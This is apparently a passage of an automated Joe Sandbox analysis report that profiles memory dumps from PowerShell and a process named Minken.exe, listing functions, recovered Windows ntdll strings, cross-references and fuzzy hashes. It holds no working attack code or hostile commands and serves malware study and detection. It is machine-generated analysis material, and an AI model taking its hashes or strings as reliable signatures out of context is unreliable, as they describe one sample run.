$^q, xrefs: 07ADA48D

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 187a47592ceb7f39e94ce9e8a4f97bac2295d68bd708248999c3ac92a7d342bf
Instruction ID: e18528edbdb81b0fb897e339466554d95f62be6bb168cf5c135a9f4827983dc2
Opcode Fuzzy Hash: 187a47592ceb7f39e94ce9e8a4f97bac2295d68bd708248999c3ac92a7d342bf
Instruction Fuzzy Hash: E83157F2B04306CFCF294B69941C6B6B7E5AFC6220B24C47AC4278A245DE35CC86C362

Uniqueness

Uniqueness Score: -1.00%

Function 07AD6F60 Relevance: 6.4, Strings: 5, Instructions: 108COMMON

Download Yara Rule

Strings

$^q, xrefs: 07AD70D6
4'^q, xrefs: 07AD710B
tP^q, xrefs: 07AD705B
$^q, xrefs: 07AD6FD9
$^q, xrefs: 07AD6FBD

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$tP^q$$^q$$^q$$^q
API String ID: 0-3997570045
Opcode ID: 8abf268f4c6f9385149f3b109fe867be4209904cad2e6658c16c64e5a3397c91
Instruction ID: a5a1389ac5be54484a2f0c70d6c86d9cd23df0b6d556d5aced11181e8290f634
Opcode Fuzzy Hash: 8abf268f4c6f9385149f3b109fe867be4209904cad2e6658c16c64e5a3397c91
Instruction Fuzzy Hash: CE31C4B1A00206DBDB2C8F55C944BA5B7F1BB89750F14856AE8375F294CB32DD44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 07ADF820 Relevance: 6.3, Strings: 5, Instructions: 71COMMON

Download Yara Rule

Strings

$^q, xrefs: 07ADF82F
$^q, xrefs: 07ADF85A
$^q, xrefs: 07ADF866
tl, xrefs: 07ADF8AB
tl, xrefs: 07ADF89D

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$tl$tl
API String ID: 0-223199581
Opcode ID: cfda7469734ccb01b7dab201ef2a34f558baf98ff6ba37a65f0edb02e8beebbe
Instruction ID: 3a6b9014a5ad05e9ef0fee36a05c2c7a4f92521feaa6057a7769611da28d62cc
Opcode Fuzzy Hash: cfda7469734ccb01b7dab201ef2a34f558baf98ff6ba37a65f0edb02e8beebbe
Instruction Fuzzy Hash: 7111DA7170430A9FD7285A5A9804B6FB7A6ABC1722F24C42AE4779A354CE31CC41C752

Uniqueness

Uniqueness Score: -1.00%

Function 07AD9A90 Relevance: 5.5, Strings: 4, Instructions: 471COMMON

Download Yara Rule

Strings

(o^q, xrefs: 07AD9EC9
(o^q, xrefs: 07AD9B76
(o^q, xrefs: 07AD9B86
(o^q, xrefs: 07AD9EB9

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q
API String ID: 0-1978863864
Opcode ID: 5dbd9dbc2cfd6f2163e277311fb075c341e0ec43b72c241282cf13fd7a140fc1
Instruction ID: f66934f967192e08aafbfcec6ed085d98de2139e0844663fbb1f92a1255534a2
Opcode Fuzzy Hash: 5dbd9dbc2cfd6f2163e277311fb075c341e0ec43b72c241282cf13fd7a140fc1
Instruction Fuzzy Hash: 57F115B1704306DFCB159F68C8147ABBBF2EFC9211F14846AE4668B291DB35EC45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 07AD51F0 Relevance: 5.2, Strings: 4, Instructions: 192COMMON

Download Yara Rule

Strings

(f~l, xrefs: 07AD52E7
(f~l, xrefs: 07AD5365
(f~l, xrefs: 07AD536F
(f~l, xrefs: 07AD52F1

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID: (f~l$(f~l$(f~l$(f~l
API String ID: 0-538009330
Opcode ID: 0f5f84a51197cd593cc696b936f5fb20652d692117c8855aa34211e1b313064f
Instruction ID: 9fbf3621bc958ba515d09dd59e6afe01f980a9f16645a27614a118d9ecca4aa0
Opcode Fuzzy Hash: 0f5f84a51197cd593cc696b936f5fb20652d692117c8855aa34211e1b313064f
Instruction Fuzzy Hash: 7D719DB0E10209DFDB14CF98C554AAEBBB3AF89310F148069D816AB355DB72EC55CF92

Uniqueness

Uniqueness Score: -1.00%

Function 07ADFBB0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 07ADFBDE
$^q, xrefs: 07ADFC18
$^q, xrefs: 07ADFBC2
$^q, xrefs: 07ADFC0C

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 107abbbc49de31b2b8935e8b022c6ce87a015aad208f5a3e44d083d80d9e55b8
Instruction ID: ba2788ec9dcd8548961592406ef571e890891c062b6e5ea3694b3ded8fdf087c
Opcode Fuzzy Hash: 107abbbc49de31b2b8935e8b022c6ce87a015aad208f5a3e44d083d80d9e55b8
Instruction Fuzzy Hash: 042147B23002065FDB345A7A5C40B27B6EA9BC1A15F248C2AE937CF395CD36CC51C361

Uniqueness

Uniqueness Score: -1.00%

Function 07AD030A Relevance: 5.0, Strings: 4, Instructions: 47COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07AD037F
$^q, xrefs: 07AD0352
4'^q, xrefs: 07AD0373
$^q, xrefs: 07AD035E

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: 8d1279471f75c242ea8c86c9bfdc3df7354990e425c38b64c1c2005d82bbfdb9
Instruction ID: 01667d186777d3de4b6ccc3fbfb1fd791d11befbfa48df6b683b370c6d5612ed
Opcode Fuzzy Hash: 8d1279471f75c242ea8c86c9bfdc3df7354990e425c38b64c1c2005d82bbfdb9
Instruction Fuzzy Hash: 2F01AD61A4D7D58FC72F1228192029A6FF25FC3950B1900DBC092CF2ABCE549D4D83A7

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Minken.exePID: 2212, Parent PID: 6556COMMON

Execution Graph

Execution Coverage:	0%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	25%
Total number of Nodes:	4
Total number of Limit Nodes:	1

Executed Functions

Function 231935C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 231935CA

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8ab0668f15a9814814d38ef007185145af5d1d9ce57b25431fc8569c16285c9b
Instruction ID: 86c760965dd08a994a0210d348dc715c4f2dc50faf26ded8140f1c3301bd89e2
Opcode Fuzzy Hash: 8ab0668f15a9814814d38ef007185145af5d1d9ce57b25431fc8569c16285c9b
Instruction Fuzzy Hash: 54900275B0550803D100719C4554716180547D0202F65D451A0425528D87958B51A5E2

Uniqueness

Uniqueness Score: -1.00%

Function 23192DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 23192DFA

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: af7c28052681c9d878834c65464e50fc5239b3945928ae1d83e0272784efb2de
Instruction ID: db43053ffb4217ee786b01e82806f0d3fc810be0af1b49a9fcb0ad8c7faae6c2
Opcode Fuzzy Hash: af7c28052681c9d878834c65464e50fc5239b3945928ae1d83e0272784efb2de
Instruction Fuzzy Hash: E690027570140813D111719C4544717080947D0242F95D452A0425518D96568B52E161

Uniqueness

Uniqueness Score: -1.00%

Function 23192C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 23192C7A

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc5f69f735aeb9c3616965bb3c1a1a6c6dd0e241f9a122349937ebb888ee88a4
Instruction ID: c963dd44388fd0c4b797423fca5e625962b0c275fcd5b59d112ab00de0da9f45
Opcode Fuzzy Hash: bc5f69f735aeb9c3616965bb3c1a1a6c6dd0e241f9a122349937ebb888ee88a4
Instruction Fuzzy Hash: 8490027570148C03D110719C844475A080547D0302F59D451A4425618D86958A91B161

Uniqueness

Uniqueness Score: -1.00%

Function 23192C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 23192C24

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0f29be8ae9e4ff54d7e2a942a366ecdd6a316d12a232531e86a824cfc941af56
Instruction ID: ee44c2396bf3ce0e103c9ff585541c06d999eff699389113c79ba6a36c6e1a94
Opcode Fuzzy Hash: 0f29be8ae9e4ff54d7e2a942a366ecdd6a316d12a232531e86a824cfc941af56
Instruction Fuzzy Hash: D2B09B71D015C9C7E705F76446087177D0477D0701F29C0A1D2030651F4739D3D1E1B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 231D2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 231D3187
UnloadEventTraceDepth, xrefs: 231D24C0
LdrpInitializeExecutionOptions, xrefs: 231D317D
UseImpersonatedDeviceMap, xrefs: 231D251C
ExecuteOptions, xrefs: 231D25A0
CFGOptions, xrefs: 231D2967
TracingFlags, xrefs: 231D2549
MinimumStackCommitInBytes, xrefs: 231D2BB0
MaxDeadActivationContexts, xrefs: 231D2D82
@, xrefs: 231D2942
DisableHeapLookaside, xrefs: 231D246D
RaiseExceptionOnPossibleDeadlock, xrefs: 231D2579
ShutdownFlags, xrefs: 231D24A1
GlobalFlag, xrefs: 231D2F3F, 231D3059
GlobalFlag2, xrefs: 231D2FC0
@, xrefs: 231D2B74
MaxLoaderThreads, xrefs: 231D24EC
Initializing the application verifier package failed with status 0x%08lx, xrefs: 231D3176
DisableExceptionChainValidation, xrefs: 231D275F
FrontEndHeapDebugOptions, xrefs: 231D2489

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 2bc3c4a11b02bccd0f62fc9366e6664adbf09874b5bc8d7f5c7a8106e5a1b5c3
Instruction ID: fcc518cc065e0065232fc6f39dcdb7d79b7afe6cad1675000a1ecd76af648c81
Opcode Fuzzy Hash: 2bc3c4a11b02bccd0f62fc9366e6664adbf09874b5bc8d7f5c7a8106e5a1b5c3
Instruction Fuzzy Hash: 7392BE72618349AFE324DF10C880F9BB7E8BB85750F0449ADFAA4D7250D770DA46CB96

Uniqueness

Uniqueness Score: -1.00%

Function 23188620 Relevance: 17.7, Strings: 14, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 231C540A, 231C5496, 231C5519
8, xrefs: 231C52E3
Critical section debug info address, xrefs: 231C541F, 231C552E
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 231C54E2
Invalid debug info address of this critical section, xrefs: 231C54B6
Address of the debug info found in the active list., xrefs: 231C54AE, 231C54FA
corrupted critical section, xrefs: 231C54C2
Critical section address., xrefs: 231C5502
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 231C54CE
Critical section address, xrefs: 231C5425, 231C54BC, 231C5534
Thread is in a state in which it cannot own a critical section, xrefs: 231C5543
double initialized or corrupted critical section, xrefs: 231C5508
undeleted critical section in freed memory, xrefs: 231C542B
Thread identifier, xrefs: 231C553A

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 9ba15fbcf4e6bfe2dcf151138a2cbcc5e00b06eaa085462ca9ca12e6d6b710ed
Instruction ID: eff8918a875b3e0d200b26fd09f75ec7550fd46b8b0cf93fdb2cc7a059c47d3e
Opcode Fuzzy Hash: 9ba15fbcf4e6bfe2dcf151138a2cbcc5e00b06eaa085462ca9ca12e6d6b710ed
Instruction Fuzzy Hash: F081ABB0900388AFDB10CF96C884F9EBBB9AB19314F254599F618B7642D375AB44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 23200274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 232002A8

Strings

RtlReAllocateHeap, xrefs: 232002BF, 23200362
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 232004D3
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 232006EA
Just reallocated block at %p to %Ix bytes, xrefs: 232005F1
HEAP: , xrefs: 232003A6, 232004B5, 232005DD, 23200682, 232006D9
HEAP[%wZ]: , xrefs: 23200399, 232004A8, 232005D0, 23200675, 232006CC
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 2320069F
About to reallocate block at %p to %Ix bytes, xrefs: 232003BA

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 3446177414-1700792311
Opcode ID: 9c0e688b492ce659934424ee4dc7fe6a76ee37d8dd49cea6a56060e358df63e7
Instruction ID: c3625dad41e233f764dad1f19335517dfb54faa9775412cad685907d7eda4832
Opcode Fuzzy Hash: 9c0e688b492ce659934424ee4dc7fe6a76ee37d8dd49cea6a56060e358df63e7
Instruction Fuzzy Hash: D6D1E175900685EFEB11DFA8C850AADBBF1FF69710F08C0D9E5459B252C734DA89CB18

Uniqueness

Uniqueness Score: -1.00%

Function 232012ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON

Download Yara Rule

Strings

Free Heap block %p modified at %p after it was freed, xrefs: 2320171B
HEAP: , xrefs: 23201706, 23201756, 232017A8, 23201809, 2320184D, 23201895, 232018E6
HEAP[%wZ]: , xrefs: 232016CD, 232016F9, 23201749, 2320179B, 232017FC, 23201840, 232018D9
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 2320186B
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 232018A5
Heap block at %p has incorrect segment offset (%x), xrefs: 2320181A
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 232018F8
Heap block at %p is not last block in segment (%p), xrefs: 232017B7
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 2320176D

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: a363716ee82c71bea4964b0b460aedd68ae052040095d7031de57ad58b59cb7a
Instruction ID: 21e936f613c5fd0bd4c6eb742c7d1aa447e3b280d631c632414d93bfc93f684b
Opcode Fuzzy Hash: a363716ee82c71bea4964b0b460aedd68ae052040095d7031de57ad58b59cb7a
Instruction Fuzzy Hash: C212D238500662EFD7259F64C880BAABBF5FF29304F0884D9E5958B652D334F9CACB50

Uniqueness

Uniqueness Score: -1.00%

Function 2314D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON

Download Yara Rule

Strings

@, xrefs: 2314D49D
Control Panel\Desktop, xrefs: 2314D45D
Control Panel\Desktop\MuiCached, xrefs: 2314D62B
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 2314D3B6
@, xrefs: 2314D663
@, xrefs: 2314D3E9
PreferredUILanguages, xrefs: 2314D4B8, 2314D4C5
PreferredUILanguagesPending, xrefs: 231AA8DE
MachinePreferredUILanguages, xrefs: 2314D685

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-3532704233
Opcode ID: a2525be26f7caffda506ebf414a1a396143955d6dde9a1727d3c3e4023724918
Instruction ID: 771d3c0ca16563fbf2af3a9f81b7846864726e22fd804ca41c3752b70030d144
Opcode Fuzzy Hash: a2525be26f7caffda506ebf414a1a396143955d6dde9a1727d3c3e4023724918
Instruction Fuzzy Hash: B9B1B1719083159FCB11DF28C480A9FBBE8AF84754F0549AEFA88D7241DB70DB48CB92

Uniqueness

Uniqueness Score: -1.00%

Function 23161070 Relevance: 11.4, APIs: 2, Strings: 4, Instructions: 940timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 231B5672

Strings

HEAP: , xrefs: 231B5884
HEAP[%wZ]: , xrefs: 231B5877
!(CheckedFlags & ~HEAP_CREATE_VALID_MASK), xrefs: 231B588F
@, xrefs: 231B5A53

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
API String ID: 3446177414-3570731704
Opcode ID: 6706e5eaa84d60fcd69e4b6d828b6de5d4a259cbf8b3992229b06aa3720369da
Instruction ID: 256c9c61581fe4a52d379d95c54f21c0192108e3a66f6038390a1ea89d6f612a
Opcode Fuzzy Hash: 6706e5eaa84d60fcd69e4b6d828b6de5d4a259cbf8b3992229b06aa3720369da
Instruction Fuzzy Hash: 01923571E01268CFEB24DF68C840B99B7BABF44350F1981EAE949A7291D7349F81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 2317D7B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 2317D959

Part of subcall function 23154859: RtlDebugPrintTimes.NTDLL ref: 231548F7

Strings

minkernel\ntdll\ldrinit.c, xrefs: 231BF2D8
LdrShutdownProcess, xrefs: 231BF2CE
$, xrefs: 2317D86D
Process 0x%p (%wZ) exiting, xrefs: 231BF2C7
$, xrefs: 2317D900

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1975516107
Opcode ID: 2629a5192c835a7869c2b05cb598803850642172a05b35de96113e223253e5a1
Instruction ID: c02d582447129f552c4da7207666df54ecc063509f1a1cd85bb2de9a20ddff0e
Opcode Fuzzy Hash: 2629a5192c835a7869c2b05cb598803850642172a05b35de96113e223253e5a1
Instruction Fuzzy Hash: B651CF71A00349DFDB54EFA4C5847CDBBB1BF58314F2981DAD6106B2D2D774AA81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 231E9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON

Download Yara Rule

Strings

\AppContainerNamedObjects, xrefs: 231E94AB, 231E94B9
Global\Session\%ld%s, xrefs: 231E94C5
%s\%ld\%s, xrefs: 231E948D
%s\%u-%u-%u-%u, xrefs: 231E9422
\Sessions, xrefs: 231E9488
AppContainerNamedObjects, xrefs: 231E946E, 231E94D6
BaseNamedObjects, xrefs: 231E9477, 231E947C
\BaseNamedObjects, xrefs: 231E949E

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
API String ID: 0-3063724069
Opcode ID: 4e334343610340ae0f3abffcb33a7ab0eda070585bb117c2a202dc2660f02646
Instruction ID: 4d1891afe9dab4d3d689012ffd718b87ece197b11adcb210ffd5482076e08923
Opcode Fuzzy Hash: 4e334343610340ae0f3abffcb33a7ab0eda070585bb117c2a202dc2660f02646
Instruction Fuzzy Hash: E9D10572C05B15AFD321DB60C840BAFB7F9AF98714F0509AAFA5897214D379CB448792

Uniqueness

Uniqueness Score: -1.00%

Function 2314D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON

Download Yara Rule

Strings

\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 2314D0CF
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 2314D146
@, xrefs: 2314D0FD
@, xrefs: 2314D313
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 2314D2C3
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 2314D262
@, xrefs: 2314D2AF
Control Panel\Desktop\LanguageConfiguration, xrefs: 2314D196

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
